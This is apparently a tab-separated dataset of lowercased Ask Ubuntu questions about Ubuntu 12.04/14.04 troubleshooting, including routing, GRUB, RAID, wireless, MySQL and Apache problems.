510334	how route works in ubuntu 14.04. box wo n't use set route	i am a little bit confused about a so simple task i am sorry i had to post this . i have a box let 's say routing os ( mainbox ) with local ip : 192.168.25.17 . that box has a vpn connection with another network let 's say 10.8.0.0/24 . tunnels are up and running and i can ping 10.8.0.10 from 192.168.25.17 alright not problem . i also have an ubuntu 14.04 ( box1 ) in my subnet with local ip : 192.168.25.7. box1 can ping mainbox just fine . but box1 ca n't ping 10.8.0.10 . i have tried setting a route with the following commands on box1 sudo route add -net 10.8.0.0/24 gw 192.168.25.17 but ping still failing . so i checked with route -n command : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.25.1 0.0.0.0 ug 0 0 0 eth0 10.8.0.0 192.168.25.17 255.255.255.0 ug 0 0 0 eth0 192.168.25.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 afterwards i issued this the tracepath 10.8.0.10 command : 1 ? : [ localhost ] pmtu 9001 1 : no reply 2 : no reply 3 : no reply it 's not seeing it at all . i am sure it 's just a little oversight . can anyone point out the mistake here ? i am also not a networking expert so kindly be explicit with your explanation ; ) thanks
510337	correct way of raid partitioning	this is a more theoretical question i ran into after i found out that it is possible with newer kernels to create partitions on a raid-volume . since grub2 it is possible to have /boot on a raid-volume . my basic setup for small servers always looked like this since then : md0 -- > ext3/4 -- > /swap md1 -- > ext3/4 -- > /boot md2 -- > ext3/4 -- > / md3 -- > ext3/4 -- > /home never ran into problems with this . however , it is possible ( i do n't know since when exactly ) to create one raid-volume and create multiple partitions on that volume ( meaning no lvm but `` native '' partitions like md0p1 etc. ) . so i 'm just wondering what 's the sense behind this ? are there any performance-related pros to go that way or is this just an organizational `` feature '' ? i seldom experienced kernel developers to include a feature that does n't provide an improvement compared to former versions so can anybody explain which environment would profit from such a setup ?
510340	google books downloader for ubuntu	i want to download free google books in pdf format . is there any google books download tool available for ubuntu ?
510341	upgrading from 12.04 to 14.04.1	after upgrading ( 12.08.2014 ) from version 12.04 to 14.04.1 i get an notification : system program problem detected . do you want to report the problem now ? so , after i click `` report problem '' i get an empty desktop . the only thing i can is to use command-line interface by ctrl+alt+f1 . what should i do to get unity work correctly ?
510343	lvm - split logical volume	i 've just installed ubuntu on a new machine and while i usually go for the classic partitioning , i decided to use ( default ) lvm this time as the idea of creating volume snapshots was quite appealing . ( moreover , i chose whole system encryption ) however , after the default install i ended up with only 2 logical volumes ( swap and root ) and am unable to take snapshots . the first question therefore is : q1 : what is the point of such default lvm setup in ubuntu ? while the inability to take snapshots is probably easy to solve , it seems to me it would not be of much use unless i create another logical volumes ( e.g . one for /home ) as i do n't want the snapshot to include files in /home folder . the second question then is : q2 : what is the good way of creating another logical volume , assigning it a mount point and moving files into it ? note # 1 : my user 's home is encrypted as well . note # 2 : while i did find several tutorials regarding use of lvm , this topic is not covered in any of them .
510345	problems initiating serial port pci card	i am running ubuntu 14.04.1 x64 with 3.16 kernel . my computer has 2 onboard serial ports which work well and 2 serial ports added by a pci card which work from time to time . that 's the card : http : //www.delock.de/produkte/f_306_seriell_89003/merkmale.html ? setlanguage=en sometimes after booting it seems like one port of these is not initialised correctly , namely ttys4 . i am not able to access it but othertimes it works well . i looked into /var/lib/setserial/autoserial.conf but that looked okay , he adds the pci serial ports as ttys4 and ttys5 . irq is correct , skip_test is activated . when the error occurs i am not able to change anything on the port with setserial . it says /dev/ttys4 : device or resource busy . i have to reboot to solve the error . it 's not only this card or this pc , i have experienced similiar problems ( only with addon cards , onboard ports work well ) on other systems . the ports are being used by an emulator . any ideas ? or any pci cards you can recommend that work well with ubuntu ? edit : i found http : //www.tldp.org/howto/serial-howto-16.html # ss16.15 but it seems a bit outdated and could n't help me .
510350	connect network from laptop to connected device	i do n't have wifi . i connect to internet using lan cable . and i am developing app for android that needs access to the internet . now how can i connect to the internet to my tablet that i have been using for development purpose ? p.s : i do n't want to use emulator : - ) and i am working on linux and my tablet is toshiba . thank you !
510352	multi screen wallpaper not using zoom setting at login	two monitors , one rotated ( which seems to be a factor here ) and the wallpaper will not properly use the zoom setting at log in . it has the appearance of being in span mode at log in . a simple change from the current zoom setting to something else , then back to zoom again will fix the problem . i can also use the following as a startup application to fix it but seems like a hack . # ! /bin/bash gsettings set org.gnome.desktop.background picture-options 'spanned' sleep 1 ; gsettings set org.gnome.desktop.background picture-options 'zoom'
510353	how to play .aac / .m4a files in cmus in 14.04 ( trusty ) ?	i am unable to playback .m4a ( aac ) files in cmus . they work in mplayer and totem . anyone know a fix ? $ cat /etc/issue ubuntu 14.04.1 lts \n \l i already tried blowing away ~/.gstreamer* , updating cmus and cmus-plugin-ffmpeg ...
510354	what is `` camera : / '' when i connect my camera to kubuntu ?	using kubuntu . when i connect my camera to the system through an usb cable , a prompt will be shown at the right bottom corner : after clicking `` open with file manager '' : dolphin opens with the path to be camera : / . what 's the meaning of camera : / here and how does kubuntu handle my camera here ?
510355	does upgrading window 8 to window 8.1 will affect ubuntu	i have a window 8.1 update to my laptop.but am afraid that after updating window 8 it will affect the grub menu and i wont able to boot into ubantu..is it safe to upgrade to window 8.1 ? ?
510361	what could `` reject due to mismatch with wpa/wpa2 '' in output of wpa_supplicant mean ?	i 'm trying to connect to an android 4.0.4 device set up to be a wifi tether using wpa_supplicant with /etc/wpa_supplicant/wpa_supplicant.conf ctrl_interface=/var/run/wpa_supplicant ap_scan=1 network= { ssid= '' stylus idroid sp 1001 '' scan_ssid=1 proto=rsn key_mgmt=wpa-psk pairwise=ccmp group=tkip psk= '' foobar '' } and this ssid and this wpa2-psk password on the device . in the output of wpa_supplicant i find scan ssid - hexdump_ascii ( len=21 ) : 53 54 59 4c 55 53 20 69 44 72 6f 69 64 20 53 50 stylus idroid sp 20 31 30 30 31 1001 wlan0 : starting ap scan for specific ssid : stylus idroid sp 1001 wlan0 : determining shared radio frequencies ( max len 1 ) wlan0 : shared frequencies ( len=0 ) : completed iteration wlan0 : add radio work 'scan ' @ 0x1fa2c90 wlan0 : first radio work item in the queue - schedule start immediately wlan0 : starting radio work 'scan ' @ 0x1fa2c90 after 0.000019 second wait scan requested ( ret=0 ) - scan timeout 30 seconds rtm_newlink : operstate=0 ifi_flags=0x1003 ( [ up ] ) rtm_newlink , ifla_ifname : interface 'wlan0 ' added wext : if_removed already cleared - ignore event wireless event : cmd=0x8b19 len=16 wlan0 : event scan_results ( 3 ) received scan results did not fit - trying larger buffer ( 8192 bytes ) received 7950 bytes of scan results ( 13 bsses ) wlan0 : bss : start scan result update 2 bss : last_scan_res_used=13/32 wlan0 : new scan results available ( own=0 ext=0 ) wps : ap [ 0 ] 50:7e:5d:3a : d6 : f2 type=0 tries=0 last_attempt=-1 sec ago blacklist=0 wps : ap [ 1 ] 44:94 : fc:79:52:72 type=0 tries=0 last_attempt=-1 sec ago blacklist=0 wps : ap [ 2 ] 08:96 : d7 : e1:82:77 type=0 tries=0 last_attempt=-1 sec ago blacklist=0 wps : ap [ 3 ] 74:31:70:5d : fe:5c type=0 tries=0 last_attempt=-1 sec ago blacklist=0 wps : ap [ 4 ] e8:94 : f6 : a5 : dd:3d type=0 tries=0 last_attempt=-1 sec ago blacklist=0 wps : ap [ 5 ] 34:31 : c4:18 : eb : a4 type=0 tries=0 last_attempt=-1 sec ago blacklist=0 wps : ap [ 6 ] 88:25:2c : f5:71:76 type=0 tries=0 last_attempt=-1 sec ago blacklist=0 wps : ap [ 7 ] 68 : b6 : fc : c3:01 : e8 type=0 tries=0 last_attempt=-1 sec ago blacklist=0 wps : ap [ 8 ] 68 : b6 : fc : d7:8d:98 type=0 tries=0 last_attempt=-1 sec ago blacklist=0 wlan0 : radio work 'scan ' @ 0x1fa2c90 done in 0.435438 seconds wlan0 : selecting bss from priority group 0 wlan0 : 0 : 32 : aa : bd:06:39:0f ssid='stylus idroid sp 1001 ' wpa_ie_len=0 rsn_ie_len=20 caps=0x11 level=-43 wlan0 : skip rsn ie - gtk cipher mismatch wlan0 : reject due to mismatch with wpa/wpa2 wlan0 : skip - ssid mismatch wlan0 : skip - ssid mismatch wlan0 : skip - ssid mismatch wlan0 : skip - ssid mismatch wlan0 : skip - ssid mismatch wlan0 : skip - ssid mismatch where i suspect `` reject du to mismatch with wpa/wpa2 '' to be supposed to be an explanation what is wrong by the formulation is - as so many others - not useful and self-explanatory . how could it mean ? the connection works when i use the widget of network-manager-gnome ( 0.9.8.8-0ubuntu4.3 ) in ubuntu 14.04 ( implying the deactivation of the interface ) in /etc/network/interfaces ) .
510363	gigabyte u24f touchpad ( elantech ) not detected	a new ubuntu user here . i just installed ubuntu 14.04 on my gigabyte u24f laptop . at first the touch-pad ( i believe it 's elantech ) was working fine but one day i turned it off using fn+f10 key from the keyboard . the next day i could no longer turn it back on and it has since been undetected by the system . xinput returns virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb optical mouse id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ video bus id=9 [ slave keyboard ( 3 ) ] ↳ power button id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] so there 's no touch-pad detected . i 'm using a usb mouse at the moment . attempting to run synclient gives '' could n't find synaptics properties . no synaptics driver loaded ? '' things i 've tried so far to no avail reinstalling xserver-xorg-input-synaptics . checking dconf.editor settings , touchpad is enabled . booting into a live usb session , touchpad no longer even works in this case . ( does this mean a fresh install would n't even solve the problem ? ) any help is greatly appreciated !
510364	grub rescue no windows repair disk plz help	i thought that deleting the partition with ubuntu on it , it would uninstall it i know now that it does n't . but now i cant open windows because all i get when i boot is the grub rescue screen i do n't know how to boot from a usb ( where i downloaded ubuntu from ) and i do n't have the disk to install windows 7 because it came with the pc anything will help . thank you in advance . i 'll be able to give feedback on weekdays .
510365	unable to mount and boot windows 7	i have windows 7 and linux mint 16 , and get this error when attempting to mount my windows partition : error mounting /dev/sda2 at /media/bugsy/windows : command-line mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/bugsy/windows '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount **'/dev/sda2'** : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . as for booting into windows 7 , booting does n't even go my computer just get stuck right after i choose windows in the partition selection . since i ca n't even boot into windows , i ca n't fix the problem by making changes to the windows partition from the windows system itself . can anyone please tell me how to fix this problem so i will be able to boot into windows again ?
510368	boot wont pick ubuntu install on hard drive	ive recently tried installing version 14 . the install process seemed to go fine but when i restart without the usb i get a 'no boot media ' error during startup . ive tried following the instructions for re installing grub on sda1 but this doesnt seem to be working . any ideas guys ? thanks in advance
510370	ubuntu 14.04 installation for surface pro 3	i booted into usb ubuntu 14.04 ( gnome ubuntu ) , and installed on the partition on the ssd , but now grub does not work and i do not see the option to boot into ubuntu . its directly goes into win 8.1 . need help to fix this ? thanks b
510373	creating new users	i already looked some topics , but i could n't find the answer to my doubts . i am learning linux and doing some exercises here in ubuntu 14.04 lts . i want to create a new user . after the creation process , it says `` account disabled '' . i select `` enable account '' , put the asked admin password , but nothing happens . the only thing got was login this user with no password . i need to put a password , enable this account and test it . thanks
510377	upgrading xubuntu desktop environment when having manually installed package	i have an old pc on which i had installed ubuntu server ( 13.10 ) to experiment with . when i decided that an gui would be easier , i installed the xubuntu-desktop package . on upgrading to ubuntu 14.04 , the xubuntu desktop environment did not , however , get the latest desktop features of xubuntu 14.04 , like whiskermenu . how do i get these new desktop features without installing each manually ? the xubuntu-desktop package itself is up to date according to apt-get , xfce reports it 's version 4.10 .
510379	domain name server not working properly	my internet was not working in the browser or the terminal . after some inverstigation , i 've found out that the problem is with the dns . i have deduced this because ping 8.8.8.8 reports 0 % packet loss . now i am able to use the dns manually with the help of the nslookup command . i am behind a proxy and using a local dns : 172.31.1.130 . i had to first determine the ip address of the proxy ( using nslookup ) and enter it in the browser . after that , internet in the browser is working normally ( i can enter domain names ) . this is , of course , just a temporary solution . but even after applying the proxy settings system wide , internet is not working `` normally '' in the terminal . that is , i am able to determine ip addresses manually and ping them , but domain names do n't work . dig does n't print anything . i 've had similar problem before ( when i was having dynamic ips ) and it was resolved by renewing the ip address using first sudo dhclient -r eth0 and then sudo dhclient eth0 . now that i have static ip addresses , sudo dhclient eth0 does n't respond anymore . totally clueless here . please help . thank you in advance .
510385	complicated script involving command line and xfce terminal	i run ubuntu 14.04 and installed the xfce terminal for some reason , and what i want to do is make a script to go to a folder on my hard drive under /server/gen2 and run several .sh scripts in different tabs of the xfce terminal , and use the nice command instead of running it directly because without the command my pc would lag . i also found tutorials but they only showed running one single script under multiple tabs , not multiple scripts under multiple tabs . also i think it would be nice if the name of the tabs was changed to the name of the scripts as well so that i can tell which script is which . the reason for this is because i 'm running a gaming server and i do n't like opening multiple windows and i want everything to be neat and in one place .
510387	help initiating	hello i am trying to install ubuntu on a wiped computer . my computer had windows 7 before i tried to recover it . the recovery process failed and left me with a wiped computer . not completely formatted but enough that i dont have the drivers to initiate a recovery . i also dont have a recovery disk that works or old windows disks . so i downloaded ubuntu . do i try to burn the .iso file on a disk and just boot it up with it ? or do i have to download a iso converter before i burn . i dont want to waste a dvd-r . thank you
510391	buetooth problem on 14.04 lts . the switch button does nothing	i just installed ubuntu 14.04 lts over windows7 on a lenovo laptop g580 . i have integrated bluetooth adapter and it worked very well on windows , but now , i can use my wireless mouse and keyboard , but when i switch in settings bluetooth on or off nothing happens and under the switch it says `` bluetooth is disabled '' and my cellphone ca n't see it . is there something i can do ? i did n't find a solution on other questions , i do n't know nothing about ubuntu by the way : ( .
510393	can not move swap space	this has been asked here , how do i repartition with gparted ? , but i 'm having problems . these two partitions both have ext4 as their file system . they are both unmounted . swap space is swapped off : i want to extend sda1 with sda3 . i have no data on sda3 however , when i click resize/move on sda1 i get this : it 's as big as it can go ! it 's the same story if sda3 is empty unallocated space : sda1 is as big as it can be . how do i extend it into the unallocated space ? worth mentioning that the screen shots are from a livecd containing gparted 's iso . i gather i need to move unallocated space next to the drive that needs to be extended . i can not click and drag sda2 containing swap space an inch . this livecd should n't be using it but it 's the best answer i 've had : i can extend the swap space no problem . what does this mean ?
510398	upgraded to ubuntu 14.04.1 , ca n't access some websites ( 403 forbidden )	i upgraded my server to 14.04.1 . after i restarted apache , i discovered that some of my sites are not accessible ( 403 forbidden ) . the common denominator is that they are my drupal sites and a group of wordpress ( multisite ) sites . a pair of other wp ( multisite ) sites in a separate directory are working . if i type the base url as an ip address , e.g. , 66.210.xxx.xx , in my browser , i get a db error : i can not connect to the database because : access denied for user 'root ' @ 'localhost ' ( using password : yes ) it 's a lamp vm , hosted remotely , so i only have ssh access . i did turn off root access with password over ssh when i did the package upgrade ; do n't know if that 's related . i do n't login as root , so i did n't think i needed it . the other noteworthy thing is that before i could start apache , i had to edit my v-hosts.conf files , because they had this : < directory `` /path/to/site '' > allow from all options -indexes followsymlinks allowoverride all < /directory > i had to change the options to : options -indexes +followsymlinks in order to restart apache .
510403	wireless connection not working	i just installed ubuntu 14.04-1 on an hp pavilion v-4000 laptop . the wireless does not work and does n't show any wireless networks . there is a switch to turn on wireless , but now it does n't work . it worked just fine when running windows xp . please advise how to get this working . thanks
510405	is there an application to identify the configuration driving a system-global keypress	much as i like unity and gnome , getting global keyboard shortcuts and mouse clicks `` right '' is a source of continual frustration . we have : the `` settings '' dialogs for keyboard and mouse the ccsm tool with chainsaw-like ability to shred your system unity tweaks ( another obscure application ) gconf-editor kernel configuration to access consoles through ctrl-alt-fx i do n't know what else . recently , i tried to re-assign super-l to lower a window rather than lock the screen for my 14.04 setup . we already have ctrl-alt-l to lower the screen anyway , i do n't need a second shortcut . but after trying several tools to re-assign the key , i just gave up . several layers of assignment all implemented the `` same '' shortcut , but it is n't easy to figure out which one ( s ) are actually causing the system to respond as it is . without that information , it is hard to reconfigure . this is a crazy-making setup that makes linux harder to use than windows for the average user : too many arcane ways to set things up , and then a tangle of confusion trying to figure out why anything happens as it does . how i long for the good old days of fvwm , the simple window manager that could assign any key or mouse click combination to do anything in any context , and the entire configuration was in a single .fvwmrc file ! using fvwm as the only holder of system-wide shortcuts make life simple , but the multi-layer approach makes microsoft 's regedit seem simple ! it would be wonderful if there were a simple script that could search all the system and user-specific files for a keyword , and report where keypress and mouse-click events matching a pattern are configured . ideally , it would support a `` universal '' keypress and mouse-click description syntax or a gui , and parse and match that in each of the many configuration files . a bonus would be if the script could print out a suggestion how to manage the setting with the least potential for inadvertent misconfiguration ( for example , helping the user avoid using ccsm when it is n't needed ) .
510409	how to solve dependencies for sass , compass and susy on ubuntu 12.04	i use ubuntu 12.04 and i am trying to install sass , compass and susy and make them work together but have a problem with dependencies over sass . i tried installing all of them with the -- pre flag to get the latest version . now , when i do compass watch sass- > my folder , or sass -v or sass -- watch style.scss : style.css , i get this error : /var/lib/gems/1.8/gems/sass-3.3.14/lib/sass/script/lexer.rb:343 : warning : regexp has invalid interval could it be a ruby error > i runned : whereis ruby and got this : ruby : /usr/bin/ruby1.8 /usr/bin/ruby /usr/lib/ruby /usr/bin/x11/ruby1.8 /usr/bin/x11/ruby /usr/share/man/man1/ruby.1.gz so i suppose i have ruby version 1.8 . could someone please help me with solving the right dependencies ? if someone knows how to do it using bundle could you please put an example of gemfile ? thanks ! edit : the commands i used to install them are : sudo gem install sass -- pre sudo gem install compass -- pre sudo gem install susy -- pre
510412	what are the steps to install windows 7 on virtual box in ubuntu 14.4lts ? i have version 4.3.10 virtual box and i do not see a extension pack for it	i want to install windows 7 on virtual box version 4.3.10 in ubuntu 14.04lts . i do not see a extension pack for this version . will i need it to install windows and if so how can it be installed ?
510414	unable to boot ubuntu after dual boot install	i have a hp 8570w with windows 7 and today i installed ubuntu ( 14.04 ) next to it by usb , after creating the right partition and such . my problem is that when the pc boots it automatically starts up windows 7 and there is no option of choosing ubuntu . i already made sure secure boot is n't checked in the bios and i ran boot-repair twice from the live usb , which gave me the following links : http : //paste.ubuntu.com/8028068/ http : //paste.ubuntu.com/8028280/ how could i solve this ? thanks in advance edit : you might not want to disable the msata device in the bios if you have the same problem . this gave me some freaky startup problems , which are happily fixed now : )
510415	mysql 5.5 server not working	i had ubuntu 14.04 installed on my system . i recently updated ubuntu and now my mysql does not start and workbench says that mysql server has been stopped . and when i try to start it gives me the following error 2014-08-12 23:02:04 - checking server status ... 2014-08-12 23:02:04 - trying to connect to mysql ... 2014-08-12 23:02:04 - ca n't connect to mysql server on '127.0.0.1 ' ( 111 ) ( 2003 ) 2014-08-12 23:02:04 - assuming server is not running 2014-08-12 23:02:04 - server start done . 2014-08-12 23:02:04 - checking server status ... 2014-08-12 23:02:04 - trying to connect to mysql ... 2014-08-12 23:02:04 - ca n't connect to mysql server on '127.0.0.1 ' ( 111 ) ( 2003 ) 2014-08-12 23:02:04 - assuming server is not running and also when i try to login using terminal ( mysql -u root -p < password > ) i get the following error : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) i have also tried to reinstall ubuntu but i am unable to do so . gives me the following error : reading package lists ... done building dependency tree reading state information ... done mysql-server-5.5 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . i have data which i have not taken backup of as i am unable to log into the server . i am a newbie please help me resolve this issue without losing my data . awaiting for your earliest response . below is the error message from cat /var/log/mysql/error.log 140813 21:22:50 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140813 21:22:50 [ note ] plugin 'federated ' is disabled . 140813 21:22:50 innodb : the innodb memory heap is disabled 140813 21:22:50 innodb : mutexes and rw_locks use gcc atomic builtins 140813 21:22:50 innodb : compressed tables use zlib 1.2.8 140813 21:22:50 innodb : using linux native aio 140813 21:22:50 innodb : initializing buffer pool , size = 128.0m 140813 21:22:50 innodb : completed initialization of buffer pool 140813 21:22:50 innodb : highest supported file format is barracuda . 140813 21:22:50 innodb : waiting for the background threads to start 140813 21:22:51 innodb : 5.5.38 started ; log sequence number 80726593570 140813 21:22:51 [ note ] server hostname ( bind-address ) : '127.0.0.1 ' ; port : 3306 140813 21:22:51 [ note ] - '127.0.0.1 ' resolves to '127.0.0.1 ' ; 140813 21:22:51 [ note ] server socket created on ip : '127.0.0.1 ' . 140813 21:22:51 [ error ] fatal error : ca n't open and lock privilege tables : incorrect file format 'user'
510416	pendrive partitioning issue gpt corrupted	pendrive size has reduced.. this is what comes when i try to formate.. please help /dev/sdb contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? the backup gpt table is not at the end of the disk , as it should be . this might mean that another operating system believes the disk is smaller . fix , by moving the backup to the end ( and removing the old backup ) ? not all of the space available to /dev/sdb appears to be used , you can fix the gpt to use all of the space ( an extra 5105280 blocks ) or continue with the current setting ? unable to satisfy all constraints on the partition .
510417	unable to connect to webserver from outside	i set up my website und my webserver but i 'm facing the problem that the website can not be opened from the internet . i 'm using ubuntu server 12.04 with apache 2.2 ( i believe ) . this is what i checked so far : http : //localhost/ responds with my website firewall : port 80 open for incoming and outgoing traffic ports.conf - > listen 80 virtual host in httpd.conf is configured port forwarding is enabled in the router configurations when the firewall is disabled and i ping the domain , i get my external ip http : //www.canyouseeme.org/ does n't see open port 80 isp does n't seem to block incoming traffic on port 80 domain name is linked to my ip still , no connection to the server can be established . what did i forget ?
510418	12.04 - > 14.04 upgrade problem	i tried the upgrade from 12.04 to 14.04 and it stalled on `` calculating changes '' so i tried it in terminal mode ... same thing . it seems i am not the first or only one . because of the many apparent problems with 14.04 ( reports of freezing , driver problems etc . ) i have decided to stick with 12.04 in the mean time b u t both the update manager and ubuntu software centre now go grey and inactive ( i.e . `` not responding '' ) . did the failed upgrade set a flag somewhere or is my problem `` worse '' ?
510419	i can i install a 32 bit version of libsdl1.2debian on a 64 bit machine ?	i 'm trying to install a 32 bit version of libsdl1.2debian as a program i 'm trying to run , powder toy , returns this when launched : /home/kyle/golly/powder-89.2-lin32/powder : error while loading shared libraries : libsdl-1.2.so.0 : wrong elf class : elfclass64 i believe this means that the libsdl-1.2.so.0 is the 64 bit library . i tried to install the 32 bit version and get this : kyle @ gamingpc : ~ $ sudo apt-get install libsdl1.2debian : i386 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package i386 i also tried looking for the package in synaptic package manager with the search string `` libsdl1.2 '' and it only returned the debug , dev and runtime libraries that i already have installed . no i386 libraries were found . help would be much appreciated , thanks .
510420	why ca n't i install the latest version of ubuntu onto a sony vaio vgn-fj1s ?	i have tried to just load ubuntu without installing it , but it freezes before it boots to the home screen . same result when you select install ubuntu .
510421	how do i know what pebs the master nodes are mapped to on ubifs ?	how can i find what pebs ( physical erase blocks ) the 2 master nodes on ubifs running on my nand flash device are mapped to ?
510422	failure to restart after upgrade to ubuntu 14.04	i am using a lenovo w530 with a nvidia quadro k1000m 2gb . yesterday after upgrading from ubuntu 12.04 to 14.04 lts , my laptop failed to restart . specifically , it would get stuck at the splash screen with the 5 dots blinking under the ubuntu logo . if i press the esc key and go to the diagnostic screen , i would see the last line saying starting cups printing spooler/server [ ok ] after looking at various suggestions ( and following many of them without any difference ) i finally suspected that it could be because of the nvidia drivers and tried to boot it using the nomodeset . that did not solve the problem except that the last few lines in the diagnostic screen now says starting mount network filesystems [ ok ] stopping mount network filesystems [ ok ] stopping lightdm display manager [ ok ] starting cups printing spooler/server [ ok ] starting mount network filesystems [ ok ] stopping mount network filesystems [ ok ] starting mount network filesystems [ ok ] stopping mount network filesystems [ ok ] sorry , i do n't know much about linux and any help would be much appreciated . thanks in advance .
510424	ubuntu installation does n't recognise windows 8	i 'm trying to install ubuntu 14.04 on a toshiba u940-101 with windows 8 preinstalled . the install tool does n't give an 'install alongside windows ' option and also does n't show the existing partitions . is there something i 'm overlooking here ?
510425	ubuntu login history ?	multiple users have logged into my 14.04 desktop system . when i want to logout or lock my screen , the drop down menu shows a long list of many of the users who have logged in . i would really like to remove that user history from the drop down menu . this list of users is not the same list of users from the lightdm greeter , this is the list of users you see in the drop down menu , once you are logged in . i have already set the lightdm greeter to not show the login history . that does not affect the lock / switch user menu drop down . hope i made myself more clear ? any suggestions would be a huge smile on my face . thanks
510428	i do n't see windows partition from ubuntu if i login with my name and password , but if i login as a guest i can , what 's going on ?	i do n't see windows partition from ubuntu if i login with my name and password , but if i login as a guest i do see it , what the problem ? this is lenovo dual boot win7 and ubuntu
510429	sftp to local ubuntu server crashes network	i have an ubuntu server ( named vader ) running in my house that i would like to set up sftp connections with my mac ( named macbookbro ) . from vader , when i run : sftp mourkeer @ macbookbro.local it connects just fine . however , from macbookbro ( or any other machine ) , if i run : sftp mourkeer @ vader.local my entire lan crashes , and i have to reboot the router . so my ubuntu machine can send sftp requests , but it ca n't receive them . ftp , scp , and most importantly , ssh all work to/from either machine . what could be causing my network to crash ? i 'm assuming it 's some sort of time out , and my router just sucks . but that does n't explain why the issue is happening to begin with . vader is connected by ethernet to my linksys e2500 router . macbookbro is connected wirelessly . i was running ubuntu 13.10 before , but i fruitlessly upgraded to 14.04 hoping that might fix the problem .
510430	disable ibus in ubuntu 14.04	i regularly switch between 3 scripts ( english/roman , kannada and hindi/sanskrit/devanagari ) . in 12.04 , i used to enable ibus by typing ctrl+space to switch from english to kannada , and again the same key to switch back to english . if i wanted to move to the next input method , i used to press alt+left shift . now i have upgraded to 14.04 . here i see the option to move to the next and previous input method . however , i do n't see any option to disable the input method completely and use the default ( english ) script . so , if i have to switch from english to kannada , i have to press ctrl+space , and then from kannada to english , i have to either press ctrl+space twice , or ctrl+shift+space is there any way to just enable/disable the ibus input just like it was in 12.04 ?
510434	grub-install fails after upgrading from 12.04 to 14.04 ( grub-pc is broken )	i just upgraded from ubuntu 12.04 to 14.04 , but during the installation grub-install failed : i continued with the installation and hoped to fix the grub issue afterwards . however , i ran into some difficulties . i have not restarted my system , as i fear that it will not be able to reboot . this is the error that i always get trying to install grub : $ sudo grub-install /dev/mapper/isw_cjccfdbihf_volume0p1 installing for i386-pc platform . grub-install : error : can not find a grub drive for /dev/mapper/isw_cjccfdbihf_volume0p1 . check your device.map . ( i also tried sudo grub-install /dev/sda but it also fails with the exact same error messsage . ) the machine seems to use a raid 1 setup . here are some information : $ ls -algh /dev/mapper/ total 0 drwxr-xr-x 2 root 120 aug 12 19:41 . drwxr-xr-x 16 root 5.2k aug 12 20:27 .. crw -- -- -- - 1 root 10 , 236 jul 28 10:30 control lrwxrwxrwx 1 root 7 aug 12 19:41 isw_cjccfdbihf_volume0p1 - > ../dm-1 lrwxrwxrwx 1 root 7 aug 12 19:41 isw_cjccfdbihf_volume0p2 - > ../dm-2 lrwxrwxrwx 1 root 7 aug 12 19:41 isw_cjccfdbihf_volume0p5 - > ../dm-3 $ sudo grub-probe -t device /boot/grub /dev/mapper/isw_cjccfdbihf_volume0p1 $ sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003b681 device boot start end blocks id system /dev/sda1 2048 468514815 234256384 83 linux /dev/sda2 468516862 488390655 9936897 5 extended /dev/sda5 468516864 488390655 9936896 82 linux swap / solaris disk /dev/sdb : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003b681 device boot start end blocks id system /dev/sdb1 2048 468514815 234256384 83 linux /dev/sdb2 468516862 488390655 9936897 5 extended /dev/sdb5 468516864 488390655 9936896 82 linux swap / solaris disk /dev/mapper/isw_cjccfdbihf_volume0p1 : 239.9 gb , 239878537216 bytes 255 heads , 63 sectors/track , 29163 cylinders , total 468512768 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/isw_cjccfdbihf_volume0p1 does n't contain a valid partition table fdisk : unable to read /dev/mapper/isw_cjccfdbihf_volume0p2 : inappropriate ioctl for device especially , the last two lines seem to indicate a deeper problem . : - ( the error message of grub-install also mentions a device.map file . $ cat /boot/grub/device.map cat : /boot/grub/device.map : no such file or directory i tried to generate it but it did not help either ( the error message did not change ) : $ sudo grub-mkdevicemap $ cat /boot/grub/device.map ( hd0 ) /dev/disk/by-id/ata-wdc_wd2500aajs-00yzca0_wd-wcayu7549707 ( hd1 ) /dev/disk/by-id/ata-wdc_wd2500aajs-00yzca0_wd-wcayu7501473 do you have any recommendations what i should try out next ? any help is deeply appreciated . update : $ debconf-show grub-pc debconf : dbdriver `` passwords '' warning : could not open /var/cache/debconf /passwords.dat : permission denied * grub-pc/install_devices : /dev/disk/by-id/dm-name-isw_cjccfdbihf_volume0 grub-pc/kopt_extracted : false grub-pc/partition_description : * grub2/linux_cmdline : grub-pc/install_devices_empty : false grub-pc/timeout : 10 